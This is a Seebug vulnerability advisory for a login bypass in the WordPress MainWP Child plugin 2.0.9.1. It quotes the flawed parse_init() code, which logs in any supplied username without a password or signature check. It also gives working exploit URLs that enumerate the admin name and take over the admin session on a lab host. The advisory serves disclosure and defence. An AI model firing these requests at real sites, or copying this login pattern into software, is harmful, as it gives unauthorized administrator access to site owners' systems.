WordPress MainWP Child Plugin 2.0.9.1 /class/MainWPChild.class.php Login Bypass Vulnerability

2015-03-16T00:00:00
ID SSV:89071
Type seebug
Reporter Root
Modified 2015-03-16T00:00:00

Description

/class/MainWPChild.class.php

    $this->posts_where_suffix = '';
    $this->comments_and_clauses = '';
    add_action('template_redirect', array($this, 'template_redirect'));
    add_action('init', array(&$this, 'parse_init'));   // 'init' fires on every WordPress request
    add_action('admin_menu', array(&$this, 'admin_menu'));
    add_action('admin_init', array(&$this, 'admin_init'));
    add_action('init', array(&$this, 'localization'));

    ……

function parse_init()
{
    global $current_user; //wp variable

    //Login the user
    if (isset($_REQUEST['login_required']) && ($_REQUEST['login_required'] == 1) && isset($_REQUEST['user']))
    {
        $username = rawurldecode($_REQUEST['user']);
        if (is_user_logged_in())
        {
            global $current_user;
            // a visitor who is already logged in but is not an administrator (level 10) is logged out first
            if ($current_user->wp_user_level != 10 && (!isset($current_user->user_level) || $current_user->user_level != 10) && !current_user_can('level_10'))
            {
                do_action('wp_logout');
            }
        }

        if (!is_user_logged_in() || $username != $current_user->user_login)
        {
            // the request-supplied username is the only input: no password, nonce
            // or MainWP signature is checked before login() is called
            if (!$this->login($username))
            {
                return;
            }

parse_init() is hooked to WordPress's init action, so it runs on every request to the site. When the request carries login_required=1 and a user parameter, the supplied username alone decides the outcome: the plugin hands it to its login() routine, which logs that account in and sets the WordPress authentication cookies, with no password, nonce or signature check of any kind. The only condition is that a visitor who is already logged in as a non-administrator is logged out first. An unauthenticated attacker who learns a valid login name can therefore obtain a session for any account, including the administrator's. Because the hook fires on every request, the action=init parameter in the URL below is incidental; the request only needs to reach WordPress with the two parameters set.

First, request the target site with ?author=1 to learn the administrator's login name (WordPress answers with a redirect to /author/<slug>/; the slug is the user's nicename, which normally equals the login name):

http://10.211.55.3/wordpress?author=1

Then build the URL with that login name:

http://10.211.55.3/wordpress/wp-admin/admin-ajax.php?action=init&login_required=1&user=admin

Opening it in a browser, the response already carries Set-Cookie headers:

[Screenshot: response headers containing Set-Cookie, https://images.seebug.org/@/uploads/1434002730976-0AB88841-E5EB-4D6C-B54C-19F2F6027C89.png]

Visiting the admin backend shows the session is logged in:

http://10.211.55.3/wordpress/wp-admin/

[Screenshot: WordPress dashboard reached without credentials, https://images.seebug.org/@/uploads/1434002755702-5FC75DDB-C31D-4FFA-9234-51A646516A05.png]